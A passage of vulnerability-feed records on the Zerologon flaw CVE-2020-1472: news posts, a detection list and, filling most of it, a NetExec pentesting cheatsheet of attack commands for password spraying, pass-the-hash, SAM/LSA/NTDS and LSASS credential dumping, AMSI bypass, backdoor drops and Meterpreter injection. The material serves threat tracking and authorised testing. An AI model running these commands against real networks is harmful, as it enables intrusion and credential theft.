CVE-2022-44875\nhttps://github.com/c0d30d1n/CVE-2022-44875-Test\n2. Test tool for CVE-2020-1472 (Zerologon)\nhttps://github.com/SecuraBV/CVE-2020-1472\n3. 
Tool for scanning/exploiting the famous SQL injection vulnerability in more than millions of sites\nhttps://github.com/mr-sami-x/SQLi", "creation_timestamp": "2025-03-29T16:32:29.000000Z"}, {"uuid": "c15a6514-56f2-4794-8bf9-798cb3260563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/2708", "content": "#Analytics\n10 most exploited vulnerabilities of the week (feb 8-14)\nCVE-2020-1472 - Microsoft Zerologon\nhttps://t.me/cybersecuritytechnologies/1742\nCVE-2021-3156 - Heap-Based Buffer Overflow in Sudo\nhttps://t.me/cybersecuritytechnologies/2577\nCVE-2021-1732 - Windows kernel 0-day exploit is used by BITTER APT in targeted attack\nhttps://t.me/cybersecuritytechnologies/2679\nCVE-2020-2037 - Palo Alto PAN-OS vulnerability\nhttps://t.me/cybersecuritytechnologies/2687\nCVE-2021-24074, CVE-2021-24086, CVE-2021-24094 - Windows IPv4/IPv6 Stack RCE/DoS Vulnerabilities\nhttps://unit42.paloaltonetworks.com/cve-2021-24074-patch-tuesday\nCVE-2021-1782 - iOS\\iPadOS 14.3 kernel LPE vulnerability\nhttps://t.me/cybersecuritytechnologies/2694\nCVE-2021-21017 - Acrobat Reader DC\u00a0a heap-based buffer overflow vulnerability\nhttps://threatpost.com/critical-adobe-windows-flaw/163789\nCVE-2020-24581 - D-Link DSL-2888A AU_2.31_V1x - RCE\nhttps://t.me/cybersecuritytechnologies/2670", "creation_timestamp": "2021-02-15T11:00:19.000000Z"}, {"uuid": "122a4960-8a62-457b-a3ea-f061ecf168d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cibsecurity/14936", "content": "\u274c Zerologon Attacks Against Microsoft DCs Snowball in a Week \u274c\n\nThe attempted compromises, which could allow full control over Active Directory identity services, are flying thick and fast 
just a week after active exploits of CVE-2020-1472 were first flagged.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2020-09-29T20:38:27.000000Z"}, {"uuid": "0d1aabff-c793-457c-8a0e-bdcda038bcf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/cibsecurity/14788", "content": "\ud83d\udd74 Patch by Tonight: CISA Issues Emergency Directive for Critical Netlogon Flaw \ud83d\udd74\n\nThe directive requires all federal agencies to apply a patch for Windows Netlogon vulnerability CVE-2020-1472 by midnight on Sept. 21.\n\n\ud83d\udcd6 Read\n\nvia \"Dark Reading: \".", "creation_timestamp": "2020-09-21T17:34:19.000000Z"}, {"uuid": "e6bde413-0869-4dc2-a5a7-0d0d9fb9c202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cibsecurity/15082", "content": "\u274c Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors \u274c\n\nMicrosoft warns that the MERCURY APT has been actively exploiting CVE-2020-1472 in campaigns for the past two weeks.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2020-10-06T18:20:48.000000Z"}, {"uuid": "90b1b0b4-edd4-42b1-b61a-399e08d0b903", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "MISP/453274cf-e60d-452a-b88e-0bf6a5a6dae4", "content": "", "creation_timestamp": "2026-05-07T22:28:58.000000Z"}, {"uuid": "a0cb175a-aced-4629-b6c2-02c689bcd78b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/suboxone_chatroom/132", 
"content": "Both Falcon identity protection modules provide Active Directory attack detections:\n\u2022 Account enumeration reconnaissance (BloodHound, Kerberoasting)\n\u2022 Bronze Bit (CVE-2020-17049)\n\u2022 Brute force attacks (LDAP simple bind, NTLM, Kerberos)\n\u2022 Credential scanning (on-premises)\n\u2022 Cloud-based (Azure AD) brute-force/credentials scanning\n\u2022 DCSync \u2014 Active Directory replication\n\u2022 DCShadow\n\u2022 Forged PAC for privilege escalation (Bulletin MS-14-068)\n\u2022 Golden Ticket\n\u2022 Hidden object detected\n\u2022 NTLM Relay Attack (including MS Exchange)\n\u2022 Overpass-the-Hash (Multiple methods - Mimikatz, CrackMapExec)\n\u2022 Pass-the-Hash (Impacket, CrackMapExec, Metasploit)\n\u2022 Pass-the-Ticket\n\u2022 Possible exploitation attempt (CredSSP) CVE-2018-0886\n\u2022 Remote execution attempts\n\u2022 Skeleton Key and Mimikatz Skeleton Key\n\u2022 Suspected NTLM authentication tampering (CVE-2019-1040)\n\u2022 ZeroLogin (CVE-2020-1472)", "creation_timestamp": "2024-12-27T11:55:02.000000Z"}, {"uuid": "94253f7a-cee5-4247-8917-e506e103e14b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/14672", "content": "\ud83d\udd74 CISA Issues Alert for Microsoft Netlogon Vulnerability \ud83d\udd74\n\nCISA has issued an alert following the discovery of publicly available exploit code for Windows elevation of privilege flaw CVE-2020-1472.\n\n\ud83d\udcd6 Read\n\nvia \"Dark Reading: \".", "creation_timestamp": "2020-09-15T20:34:30.000000Z"}, {"uuid": "f764cd92-c7d8-4296-8b61-129ea195dafd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/GithubRedTeam/84953", "content": "\ud83d\udea8 GitHub 
monitoring alert\n\n\ud83d\udea8 Keywords found: #NTLM Relay #AD #SMB\n\n\ud83d\udce6 Project name: apex-predator\n\ud83d\udc64 Project author: noemvex\n\ud83d\udee0 Language: Python\n\u2b50 Stars: 0  |  \ud83c\udf74 Forks: 0\n\ud83d\udcc5 Updated: 2026-04-10 21:00:44\n\n\ud83d\udcdd Project description:\nAdvanced AD Offensive Engine. Automates the path from stealthy recon to domain compromise. Features unauthenticated SMB Signing/NTLM Relay audits, ZeroLogon (CVE-2020-1472) hunting, and authenticated LAPS extraction. Engineered for Red Team precision with professional, executive-ready HTML reporting.\n\n\ud83d\udd17 Click to visit the project URL", "creation_timestamp": "2026-05-20T08:05:48.000000Z"}, {"uuid": "d279821b-784b-4ebb-87b3-27bbd6888dfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. 
Always check `nxc  --help` and `nxc  -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc   -u  -p  / -H  [flags] -M  -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10                    # Single host\nnxc smb 192.168.1.0/24                  # CIDR range\nnxc smb 192.168.1.1-100                 # Range\nnxc smb targets.txt                     # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' 
-d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10     # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3      # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5       # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt    # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H  -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey  -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24                              # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt  # Find relay targets\n```\n\n### 
Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares              # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write  # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\"            # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users               # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled     # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt  # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups              # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers           # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups        # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol            # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions        # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks               # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces          # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users      # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute           # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta             # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist            # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content       # Search 
file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3       # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files    # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\"                    # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable'           # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\"       # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs          # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32            # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode             # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts                   # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump                # Using regdump\n\n# LSA Secrets\nnxc 
smb 192.168.1.10 -u admin -p pass --lsa                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump                # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds                  # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss              # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi          # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin     # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled        # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi                      # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies              # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem             # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm                       # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi                   # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk                  # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010                   # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon                  # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac                      # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare             # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic                 # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost                   # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M 
coerce_plus                # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast                  # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av                    # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca                    # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav                     # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus                # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password               # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin              # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc                    # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy                     # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky                     # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer               # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator            # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy                    # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump                  # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump                  # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz                # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash                # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider               # Recursive 
LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil                  # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover          # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger           # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm                 # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng                 # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty                     # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman                    # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp                    # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc                       # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi                      # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam                     # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol                      # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb             # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam                       # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host               # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis                       # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated          # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1                    # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl                  # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac          
             # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc                       # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions        # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++                 # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history        # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files              # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped                   # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec               # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject                # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery              # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate               # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi                        # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as                # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp                 # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable  # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac                # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query                 # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon              # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection           # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass 
-d DOMAIN --users           # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123   # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups          # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers       # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list         # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid         # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count               # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation    # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required     # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users              # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation           # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa                       # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting &amp; ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c 
DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs                      # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread                  # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts               # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer             # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users            # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network               # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword      # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword          # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership           # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps                      # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker              # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq                       # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete                  # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k                     # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso                       # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm                      # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets                   # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc                 # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami                    # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p 
pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps                     # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985                # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986                # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986           # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http         # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https        # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https   # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15          # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam                      # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa                      # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd          # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell   # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass 
